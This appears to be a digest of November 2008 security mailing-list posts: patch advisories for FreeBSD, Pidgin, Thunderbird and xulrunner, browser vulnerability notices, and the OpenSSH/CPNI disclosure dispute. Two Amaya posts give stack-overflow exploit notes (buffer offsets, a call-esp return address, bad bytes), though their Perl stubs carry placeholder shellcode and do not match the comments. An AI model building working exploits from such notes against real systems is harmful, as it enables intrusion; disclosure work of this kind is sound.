RELENG_7_0, or RELENG_6_3 security branch dated after the correction
date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3 and
7.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random.patch
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random.patch.asc

[FreeBSD 6.x]
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random6x.patch
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random6x.patch.

[USN-675-1] Pidgin vulnerabilities

[Marc Deslauriers]

===
Ubuntu Security Notice USN-675-1  November 24, 2008
pidgin vulnerabilities
CVE-2008-2927, CVE-2008-2955, CVE-2008-2957, CVE-2008-3532
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  pidgin  1:2.2.1-1ubuntu4.3

Ubuntu 8.04 LTS:
  pidgin  1:2.4.1-1ubuntu2.2

After a standard system upgrade you need to restart Pidgin to effect
the necessary changes.

Details follow:

It was discovered that Pidgin did not properly handle certain malformed
messages in the MSN protocol handler. A remote attacker could send a specially
crafted message and possibly execute arbitrary code with user privileges.
(CVE-2008-2927)

It was discovered that Pidgin did not properly handle file transfers containing
a long filename and special characters in the MSN protocol handler. A remote
attacker could send a specially crafted filename in a file transfer request
and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)

It was discovered that Pidgin did not impose resource limitations in the UPnP
service. A remote attacker could cause Pidgin to download arbitrary files 
and cause a denial of service from memory or disk space exhaustion.
(CVE-2008-2957)

It was discovered that Pidgin did not validate SSL certificates when using a
secure connection. If a remote attacker were able to perform a
man-in-the-middle attack, this flaw could be exploited to view sensitive
information. This update alters Pidgin behaviour by asking users to confirm
the validity of a certificate upon initial login. (CVE-2008-3532)


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3.diff.gz
  Size/MD5:57978 254c333b127e6f18bf5deff2df48aace

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3.dsc
  Size/MD5: 1475 9e202c8cb64aa6f5b813c989caea7b93

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1.orig.tar.gz
  Size/MD5: 12868326 3de2ef29d4a62c515a223cba5d4c4671

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   143616 602c6c56f30d9f40013e41841d595edb

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   123834 625e7e989d6a29d8887137b407078c90

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   257634 8febe671445a717eb09809b591825416

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:  1390894 5e360d9bd1b994a21e44bdd434004d42

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   201660 6844e4107ac223deaf57d022bd84540a

http://security.ubuntu.com/ubuntu/pool/universe/p/pidgin/gaim_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   119274 7836e1d1c689528c1bd533e51b8b110b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:   311318 fec706b32fe99bb814056899e85a30c2

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:  1566428 e57dd483c64314b78811ae83afd01ab7

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:  4873688 6b59077f56042c373ba0a0537766f197

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:   646402 f9d51d9559dae7a65e1ad771338d7cd9

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:   293002 767d3b4cea192f2f567bc4004e5c34ae

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:  1454484 051f1fe1704333c292e089d23cf1be4c

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:  4585518 02a2bac7b6ab2be201c1b2956cbae8af

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:   603628 f071b1d796ca4d7894777b7c099e00f1

  lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.2.1-1ubuntu4.3_lpia.deb
  Size/MD5:   292214 f14424242e4002dc026fd32c55fd859e

http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.2.1-1ubuntu4.3_lpia.deb
  Size/MD5:  1432448 5db14c19c6010

Re: Re: OpenSSH security advisory: cbc.adv

[Guillaume MULLER]

Hey!

They put a condition because of "National Security". Should that mean 
that they use OpenSSH in "National Security"-sensitive applications 
(interesting ;););))?


If so, should that mean that they implicitely recognize the very good 
work done by the community?


If so, why not act politely with the community and share knowledge?

This would make the software better, so that they could still use it in 
their applications.


How can't they understand that?

Why not just share the knowledge and just ask for some time (fixed 
amount? or just "when a solution will be found") before public release 
of the details of the attacks?


Why not release the details and switch to another system if OpenSSH is 
not what they need anymore?


So one more entity that just want to benefit from FOSS, but not 
contribute...


If I were the developpers, then I would just retaliate (humoristically) 
by sending them a similar (fake)-contract/NDA, asking them not to use 
OpenSSH, but share National Sensitive information. In other words, just 
ask them to share THEIR knowledge without US providing our tools.


There are some times where I hate the BSD licence, because it does not 
force people to cooperate! (even if I don't think any other licence 
would help here...)


My 2 cents and sorry for the off-topic subject...

Cheers

GM

--
Guillaume MULLER
Post-Doc - Sala C2-50
Laboratório de Técnicas Inteligentes (LTI)
Depto. Eng. Computação e Sistemas Digitai(PCS)
Escola Politécnica da Universidade de São Paulo
Av. Prof. Luciano Gualberto, 158 travessa 3
05508-900 - São Paulo - SP - Brasil
Tel: +55 11 3091 5397
http://www.lti.pcs.usp.br/~guillaume

Google Chrome MetaCharacter URI Obfuscation Vulnerability

[Aditya K Sood]

Advisory: Google Chrome MetaCharacter URI Obfuscation Vulnerability.

Version Affected: All
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

Description:
Google chrome is vulnerable to URI Obfuscation vulnerability. An
attacker can easily
perform malicious redirection by manipulating the browser functionality.
The link can not
be traversed properly in status address bar.This could facilitate the
impersonation of
legitimate web sites in order to steal sensitive information from
unsuspecting users. The
URI specified with @ character with or without NULL character causes the
vulnerability.

Proof of Concept:
http://www.secniche.org/gcuri/index.html 
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft
Windows
XP SP2 platform.The versions tested are:

Chrome/0.2.149.30
Chrome/0.2.149.29

Disclosure Timeline:
Disclosed: 24 November 2008
Release Date. 24 November ,2008

Vendor Response:
Reported to Google.

Credit:
Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time
of publishing based
on currently available information. Use of the information constitutes
acceptance for use
 in an AS IS condition. There is no representation or warranties, either
express or implied
by or with respect to anything in this document, and shall not be liable
for any implied
warranties of merchantability or fitness for a particular purpose or for
any indirect special
or consequential damages.

[SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

[svrt]

1. General Information

ffdshow is a DirectShow filter and VFW codec for many audio and video 
formats, such as DivX, Xvid and H.264. It is the most popular audio and 
video decoder on Windows. Besides a stand-alone setup package, ffdshow is 
often included in almost all codec pack software such as K-lite Codec Pack, 
XP Codec Pack, Vista Codec Package, Codec Pack All in one,.


In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability 
in ffdshow which affects all available internet browsers. Taking advantage 
of the flaw, hackers can perform remote attack, inject viruses, steal 
sensitive information and even take control of the victim's system.


Since ffdshow is an open source software (can be found at 
http://sourceforge.net/projects/ffdshow-tryout), we have contacted the 
developing team and they have patched the vulnerability in the latest 
version of ffdshow.


Details : http://security.bkis.vn/?p=277
SVRT Advisory  : SVRT-05-08
Initial vendor notification :  13-11-2008
Release Date : 24-11-2008
Update Date  : 24-11-2008
Discovered by : SVRT-Bkis
Security Rating :  Critical
Impact  Remote : Code Execution
Affected Software : ffdshow  (< rev2347 20081123)

2. Technique Description

The flaw occurs when ffdshow works with a media stream (e.g. 
http://[website]/test.avi). On parsing an overly long link, ffdshow would 
encounter a buffer overflow error as the memory is not allocated and 
controlled well.


ffdshow is in fact a codec component for decoding multimedia formats so it 
must be used via some media player; the default program is Windows Media 
Player (wmp). Due to this reason, all internet browsers that support wmp 
plug-in are influenced by this vulnerability, such as Internet Explorer, 
Firefox, Opera, Chrome...


In order to exploit, hackers trick users into visiting a website containing 
malicious code. If successful, malicious code would be executed without any 
users' further interaction. Hackers can then take complete control of the 
system.


3. Solution

As for the seriousness of the vulnerability, it has been patched in the 
latest version of ffdshow by the developing team of the software. Bkis 
Internetwork Security Center highly recommends that users should update 
ffdshow to the latest version here: 
http://sourceforge.net/project/showfiles.php?group_id=173941&package_id=199416&release_id=439904


At the moment, there are a lot of software packages packing ffdshow that 
haven't been updated. On account of this, users should also update the 
ffdshow latest versions:

- K-Lite Codec Pack (lastest version).
- XP Codec Pack (lastest version).
- Vista Codec Package (lastest version).
- Codec Pack All in one (lastest version).
- Storm Codec Pack (lastest version).
- And many other software Codec packages using ffdshow.

In addition, software producers that make use of ffdshow in their products 
should also update these products with the latest version of ffdshow.


4. Credits
Thanks Nguyen Anh Tai for working with SVRT-Bkis.


Bach Khoa Internetwork Security Center (BKIS)
Hanoi University of Technology (Vietnam)

Email : [EMAIL PROTECTED]
Website : www.bkav.com.vn
WebBlog : security.bkis.vn
Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg
 

Amaya (id) Remote Stack Overflow Vulnerability

[writ3r]

#W3C Amaya 10.1 Web Browser
#
# Amaya (id) Remote Stack Overflow Vulnerability
#
# Written and discovered by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/41/
# --
#
# Shellcode notes: 
# The application fails to correctly process certain bytes: 
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf 
0xeb). 
#
# After reviewing the source code, the below function modifies the
# shellcode:  
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1f <-- Thanks Luigi!
# --
#
# The "id" variable of a tag contains a buffer overflow: 
# r0ut3r
#
# The application will not overflow with normal alphanumeric characters. 
# To fill the buffer I had to use "A/" repeated 91 times. Therefore buffer 
length is: 
# 91 * 2 = 182 + 4
#
# [junk] + [eip] + [shellcode]
#  182   +   4   +  sizeof(shellcode)
#
# ESP points to data after EIP. 
#
# "id" variable Proof of concept: 
#!/usr/bin/perl

use warnings;
use strict;

my $shellcode = 'C' x 350;

# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data   =   'test';
print $data;

Amaya (URL Bar) Remote Stack Overflow Vulnerability

[writ3r]

#W3C Amaya 10.1 Web Browser
#
# Amaya (URL Bar) Remote Stack Overflow Vulnerability
#
# Written and discovered by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/40/
# --
#
# Shellcode notes: 
# The application fails to correctly process certain bytes: 
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf 
0xeb). 
#
# After reviewing the source code, the below function modifies the
# shellcode:  
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1f <-- Thanks Luigi!
# --
# 
# The URL bar contains a buffer overflow vulnerability: 
# buffer length: 1600 bytes
#
# [junk] + [eip] + [shellcode]
#  1600  +   4   +  sizeof(shellcode)
#
# ESP points to data after EIP. 
#
# I found it difficult to access the URL bar via HTML code. For example, 
compile the above code, 
# write it to a HTML file, then load it into the browser. Attempt to click the 
link and
# you will notice there is a 800 character limit on the link. 
#
# To bypass this problem click the link then select "Links" >> "Create or 
change link...". 
# Now click "Confirm". Alternatively just copy the payload into the URL bar. 
#
# URL Bar Proof of concept: 
# 
#!/usr/bin/perl

use warnings;
use strict;

my $shellcode = 'C' x 80;

# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data   =   'r0ut3r';
print $data;

Re: Re: MS Internet Explorer 7 Denial Of Service Exploit

[Glynn Clements]

[EMAIL PROTECTED] wrote:

> On Konqueror 3.5.9, what happens is that this childish code builds a
> huge string, eats memory, causes swapping, and finally blows away
> Konq. Linux and X and everything else stay up and recover nicely. 
> (Gentoo/AMD64X2/3G mem)
> 
> This isn't an exploit -- at least not on Linux -- it's just kiddie
> stupidity. It doesn't take any particular cleverness to blow memory by
> dynamically creating bigger and bigger data structures. With virtual
> memory and 64-bit pointers, when exactly do we return -ENOMEM?

When RLIMIT_AS has been exceeded.

If you disable the use of mmap'd-malloc() via mallopt(M_MMAP_MAX, 0),
you can effectively limit malloc() via RLIMIT_DATA.

If you really want to allow a single process to use all available RAM
for itself, you can; but you don't have to.

It might be nice if the browser limited the amount of memory which
could be used by e.g. JavaScript (although for Firefox, you would
probably want the limit to only be applied to "external" JavaScript,
given that much of the browser itself is written in JavaScript).

-- 
Glynn Clements <[EMAIL PROTECTED]>

[ MDVSA-2008:235 ] mozilla-thunderbird

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:235
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: November 20, 2008
 Affected: 2008.1, 2009.0, Corporate 3.0
 ___

 Problem Description:

 A number of security vulnerabilities have been discovered and
 corrected in the latest Mozilla Thunderbird program, version 2.0.0.18
 (CVE-2008-5012, CVE-2008-5014, CVE-2008-5016, CVE-2008-5017,
 CVE-2008-5018, CVE-2008-5021, CVE-2008-5022, CVE-2008-5024,
 CVE-2008-5052).
 
 This update provides the latest Thunderbird to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5012
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5014
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5016
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5017
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5018
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5022
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5024
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5052
 http://www.mozilla.org/security/known-vulnerabilities/thunderbird20.html
 ___

 Updated Packages:

 Mandriva Linux 2008.1:
 4dbcbe76c3f449d704d34e924fc6a44c  
2008.1/i586/mozilla-thunderbird-2.0.0.18-0.1mdv2008.1.i586.rpm
 e42314d7ed8d70259878527ac0ffd4c8  
2008.1/i586/mozilla-thunderbird-af-2.0.0.18-1.1mdv2008.1.i586.rpm
 ef06c31fd0f85a52cdaaf60410be5a20  
2008.1/i586/mozilla-thunderbird-be-2.0.0.18-1.1mdv2008.1.i586.rpm
 5b27502980dd7f297e689ee1c7a7f65d  
2008.1/i586/mozilla-thunderbird-bg-2.0.0.18-1.1mdv2008.1.i586.rpm
 6588be4f30aafeadf81a9a4391bb3ec3  
2008.1/i586/mozilla-thunderbird-ca-2.0.0.18-1.1mdv2008.1.i586.rpm
 10c52e9184c3905077916f9c00ad16d1  
2008.1/i586/mozilla-thunderbird-cs-2.0.0.18-1.1mdv2008.1.i586.rpm
 f2e2514a8460f10dd42e9ff0b55587ab  
2008.1/i586/mozilla-thunderbird-da-2.0.0.18-1.1mdv2008.1.i586.rpm
 4322b77dc052303394839d2fea6b7196  
2008.1/i586/mozilla-thunderbird-de-2.0.0.18-1.1mdv2008.1.i586.rpm
 9fe2e12dfef008b8574b29c59beabb5d  
2008.1/i586/mozilla-thunderbird-devel-2.0.0.18-0.1mdv2008.1.i586.rpm
 fd3f295fdf12176362dfea27897f831e  
2008.1/i586/mozilla-thunderbird-el-2.0.0.18-1.1mdv2008.1.i586.rpm
 5211c7c15e766387594daf84971dc50c  
2008.1/i586/mozilla-thunderbird-en_GB-2.0.0.18-1.1mdv2008.1.i586.rpm
 3812339c0d576eaedc666cfc3eb3417d  
2008.1/i586/mozilla-thunderbird-enigmail-2.0.0.18-0.1mdv2008.1.i586.rpm
 4273fcb9b420c4866f522be4e191481f  
2008.1/i586/mozilla-thunderbird-enigmail-ar-2.0.0.18-1.1mdv2008.1.i586.rpm
 c3f6b66c9e1edbbcef55a6b86fa16088  
2008.1/i586/mozilla-thunderbird-enigmail-ca-2.0.0.18-1.1mdv2008.1.i586.rpm
 75563c129897544b64aeae047c1c11dd  
2008.1/i586/mozilla-thunderbird-enigmail-cs-2.0.0.18-1.1mdv2008.1.i586.rpm
 1931445274dd210b9f0b7ad2c8a8b819  
2008.1/i586/mozilla-thunderbird-enigmail-de-2.0.0.18-1.1mdv2008.1.i586.rpm
 f11cbc0862625a0e849889c7e430fed9  
2008.1/i586/mozilla-thunderbird-enigmail-el-2.0.0.18-1.1mdv2008.1.i586.rpm
 3ca5d69f06b202657b30a707f663f540  
2008.1/i586/mozilla-thunderbird-enigmail-es-2.0.0.18-1.1mdv2008.1.i586.rpm
 b858d3227153f7a574bc58dd49fec328  
2008.1/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.18-1.1mdv2008.1.i586.rpm
 9c8f7c0eb5f02726646d4bcb64082e03  
2008.1/i586/mozilla-thunderbird-enigmail-fi-2.0.0.18-1.1mdv2008.1.i586.rpm
 40a7080f8e9501a8a5e6416ba2504cdc  
2008.1/i586/mozilla-thunderbird-enigmail-fr-2.0.0.18-1.1mdv2008.1.i586.rpm
 f7e0a6ea58ef1074cadc1f9931c0b4b7  
2008.1/i586/mozilla-thunderbird-enigmail-hu-2.0.0.18-1.1mdv2008.1.i586.rpm
 b24917105118bc4ce79d96ece554465b  
2008.1/i586/mozilla-thunderbird-enigmail-it-2.0.0.18-1.1mdv2008.1.i586.rpm
 36c3ee1e4f4869e643be9224defce6af  
2008.1/i586/mozilla-thunderbird-enigmail-ja-2.0.0.18-1.1mdv2008.1.i586.rpm
 7575a6cff93362e3007e6d01b987d68e  
2008.1/i586/mozilla-thunderbird-enigmail-ko-2.0.0.18-1.1mdv2008.1.i586.rpm
 a68166dd01dfeb1bc81a4c349a452fa8  
2008.1/i586/mozilla-thunderbird-enigmail-nb-2.0.0.18-1.1mdv2008.1.i586.rpm
 30c0af7936f2dfac07bd276181e6d92a  
2008.1/i586/mozilla-thunderbird-enigmail-nl-2.0.0.18-1.1mdv2008.1.i586.rpm
 1ac55f0b08c53ba3a2b1fce250ba2c6f  
2008.1/i586/mozilla-thunderbird-enigmail-pl-2.0.0.18-1.1mdv2008.1.i586.rpm
 5a6b4ede4433a253afcfe20579b2d0c8  
2008.1/i586/mozilla-thunderbird-enigmail-pt-2.0.0.18-1.1mdv2008.1.i586.rpm
 5c9a440ac89adf1e5814b4facd18f45c  
2008.1/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.18-1.1mdv2008.1.i586.rpm
 0581eafe5d505aa256ce2748d8814f0a  
2008.1/i586/mozilla-thunderbird-enigmail-ro-2.0.0

Re: MS Internet Explorer 7 Denial Of Service Exploit

[Nick Kirby]

[EMAIL PROTECTED] wrote:

On Konqueror 3.5.9, what happens is that this childish code builds a huge 
string, eats memory, causes swapping, and finally blows away Konq.  Linux and X 
and everything else stay up and recover nicely.  (Gentoo/AMD64X2/3G mem)

This isn't an exploit -- at least not on Linux -- it's just kiddie stupidity.  
It doesn't take any particular cleverness to blow memory by dynamically 
creating bigger and bigger data structures.  With virtual memory and 64-bit 
pointers, when exactly do we return -ENOMEM?

  
Could you be a bit more specific as to the circumstances of the DOS 
exploit and how this could be replicated?

Thank you.

Re: Re: Re: MS Internet Explorer 7 Denial Of Service Exploit

[0xjbrown41]

Not promoting this bug in any way in particular, but browsers should be stable 
enough to take input and process it with getting 'blown' away. IMHO just 
because it 'crashes' doesn't mean its an exploit; just because it there is no 
fault doesn't make it not an issue.

[SECURITY] [DSA 1669-1] New xulrunner packages fix several vulnerabilities

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1669-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 23, 2008 http://www.debian.org/security/faq
- 

Package: xulrunner
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-0016 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 
CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 
CVE-2008-4065 CVE-2008-4066 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069 
CVE-2008-4582 CVE-2008-5012 CVE-2008-5013 CVE-2008-5014 CVE-2008-5017 
CVE-2008-5018 CVE-2008-0017 CVE-2008-5021 CVE-2008-5022 CVE-2008-5023 
CVE-2008-5024

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-0016

   Justin Schuh, Tom Cross and Peter Williams discovered a buffer
   overflow in the parser for UTF-8 URLs, which may lead to the
   execution of arbitrary code.

CVE-2008-3835

   "moz_bug_r_a4" discovered that the same-origin check in
   nsXMLDocument::OnChannelRedirect() could by bypassed.

CVE-2008-3836

   "moz_bug_r_a4" discovered that several vulnerabilities in
   feedWriter could lead to Chrome privilege escalation.

CVE-2008-3837

   Paul Nickerson discovered that an attacker could move windows
   during a mouse click, resulting in unwanted action triggered by
   drag-and-drop.

CVE-2008-4058

   "moz_bug_r_a4" discovered a vulnerability which can result in
   Chrome privilege escalation through XPCNativeWrappers.

CVE-2008-4059

   "moz_bug_r_a4" discovered a vulnerability which can result in
   Chrome privilege escalation through XPCNativeWrappers.

CVE-2008-4060

   Olli Pettay and "moz_bug_r_a4" discovered a Chrome privilege
   escalation vulnerability in XSLT handling.

CVE-2008-4061

   Jesse Ruderman discovered a crash in the layout engine, which might
   allow the execution of arbitrary code.

CVE-2008-4062

   Igor Bukanov, Philip Taylor, Georgi Guninski and Antoine Labour
   discovered crashes in the Javascript engine, which might allow the
   execution of arbitrary code.

CVE-2008-4065

   Dave Reed discovered that some Unicode byte order marks are
   stripped from Javascript code before execution, which can result in
   code being executed, which were otherwise part of a quoted string.

CVE-2008-4066

   Gareth Heyes discovered that some Unicode surrogate characters are
   ignored by the HTML parser.

CVE-2008-4067

   Boris Zbarsky discovered that resource: URls allow directory
   traversal when using URL-encoded slashes.

CVE-2008-4068

   Georgi Guninski discovered that resource: URLs could bypass local
   access restrictions.

CVE-2008-4069

   Billy Hoffman discovered that the XBM decoder could reveal
   uninitialised memory.

CVE-2008-4582

   Liu Die Yu discovered an information leak through local shortcut
   files.

CVE-2008-5012

   Georgi Guninski, Michal Zalewski and Chris Evan discovered that
   the canvas element could be used to bypass same-origin
   restrictions.

CVE-2008-5013

   It was discovered that insufficient checks in the Flash plugin glue
   code could lead to arbitrary code execution.

CVE-2008-5014

   Jesse Ruderman discovered that a programming error in the
   window.__proto__.__proto__ object could lead to arbitrary code
   execution.

CVE-2008-5017

   It was discovered that crashes in the layout engine could lead to
   arbitrary code execution.

CVE-2008-5018

   It was discovered that crashes in the Javascript engine could lead to
   arbitrary code execution.

CVE-2008-0017
   
   Justin Schuh discovered that a buffer overflow in http-index-format
   parser could lead to arbitrary code execution.

CVE-2008-5021

   It was discovered that a crash in the nsFrameManager might lead to
   the execution of arbitrary code.

CVE-2008-5022

   "moz_bug_r_a4" discovered that the same-origin check in
   nsXMLHttpRequest::NotifyEventListeners() could be bypassed.

CVE-2008-5023

   Collin Jackson discovered that the -moz-binding property bypasses
   security checks on codebase principals.

CVE-2008-5024

   Chris Evans discovered that quote characters were improperly
   escaped in the default namespace of E4X documents.

For the stable distribution (etch), these problems have been fixed in
version 1.8.0.15~pre080614h-0etch1. Packages for mips will be provided
later.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), these problems have been fixed in version 1.9.0.4-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referen

Re: OpenSSH security advisory: cbc.adv

[Otto Moerbeek]

On Fri, Nov 21, 2008 at 03:19:03AM -0700, Damien Miller wrote:

> OpenSSH Security Advisory: cbc.adv
> 
> Regarding the "Plaintext Recovery Attack Against SSH" reported as
> CPNI-957037[1]:
> 
> The OpenSSH team has been made aware of an attack against the SSH
> protocol version 2 by researchers at the University of London.
> Unfortunately, due to the report lacking any detailed technical
> description of the attack and CPNI's unwillingness to share necessary
> information, we are unable to properly assess its impact.

It is really sad researchers are prevented to share details with
developers by some lame institute. The OpenSSH developers were asked to
undersign the document below. Apart from asking to be cited as the
discoverer of a vulnerability, I would say that "you will only get
details if you do X" is a form of blackmail.

So the result is that the developers of the main implementation of the
SSH protocol are without the details of the vulnerability, all in the
cause of "protecting national security".

-Otto

=

Centre for the Protection of National
  Infrastructure
  Framework for Vulnerability Information
   Sharing
Introduction

CPNI was formed from the merger of the National Infrastructure
Security Co-ordination Centre (NISCC) and the National Security
Advice Centre (NSAC).

CPNI provides integrated security advice (combining information,
personnel and physical) to the businesses and organisations which
make up the national infrastructure. Through the delivery of this
advice, we protect national security.

One of the primary CPNI functions is to establish long-term
partnerships with those companies that provide CNI services. This
relationship is reinforced on a regular basis by the provision of various
CPNI advisory materials on IT-related threats and vulnerabilities.
CPNI conducts extensive research into vulnerabilities, the results of
which we share with both CNI organisations and product suppliers. To
enable us to share such information in confidence, CPNI provides this
non-legally binding Framework as a mechanism to establish trusted
partnerships.

This Framework is intended to help CPNI and commercial organisations
to work in partnership to discuss and resolve issues arising from
vulnerability disclosures. By adhering to this framework you will be
part of a mechanism through which technical and commercial
vulnerability information can be shared between partners.
This Framework is intended to increase the flow of vulnerability
information within a trusted environment whereby issues can be
solved quickly and easily, while at the same time limiting the likelihood
of uncontrolled public release.

The Traffic Light Protocol

CPNI has agreed a labelling mechanism known as the "Traffic Light
Protocol" (TLP) with members of its Information Exchanges. This same
protocol has now been accepted as a model for trusted information
exchange by over 30 other countries. The protocol provides for four
"information sharing levels" for the handling of sensitive information.
The four information sharing levels are:
   #  RED - Personal for named recipients only. In the context of a
  meeting, for example, RED information is limited to those
  present. In most circumstances RED information will be passed
  verbally or in person.
   #  AMBER - Limited distribution. The recipient may share AMBER
  information with others within their organization, but only on a
  "need-to-know" basis.
   #  GREEN - Community wide. Information in this category can be
  circulated widely within a particular community. However, the
  information may not be published or posted on the Internet, nor
  released outside of the community.
   #  WHITE - Unlimited. Subject to standard copyright rules, WHITE
  information may be distributed freely, without restriction.

Framework for the exchange of Vulnerability Information

This framework is not a legal contract. It is a statement of the
requirements for information sharing between CPNI and the receiving
organisation.
The Centre for the Protection of National Infrastructure (CPNI) and the
receiving organization jointly agree:
   #  to label vulnerability information to be shared with one of the
  four "information sharing levels" identified in the Traffic Light
  Protocol (TLP);
   # where necessary and appropriate to protectively mark the
 information in line with their own internal security policies and in
 accordance with the TLP;
   # to use the same degree of care to maintain confidentiality of
 shared vulnerability information as is used for their own internal
 or commercially sensitive information;
   # neither directly nor indirectly disclose to a third party in advance
 of the agreed public disclosure date, either the existence of, or
 details pertaining to, vulnerability infor

Revised: OpenSSH security advisory: cbc.adv

[Damien Miller]

Hi,

There was an error in the original advisory. The estimate of 32768
attempts to carry out a successful attack is incorrect. The correct
estimate is 11356 attempts. A revised version is now available at:
http://www.openssh.com/txt/cbc.adv

The advisory and its recommendations are otherwise unchanged.

-d

Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

[tecklord]

Vulnerability is confirmed on Pi3Web 2.03 PL 2. If an attacker sends a request 
to one of the files in the isapi directory, the dialog box appears on the host 
system. Until the OK button on the host system is pressed, Pi3Web does not 
serve any requests. There is no application crash, but technically, it`s a DoS.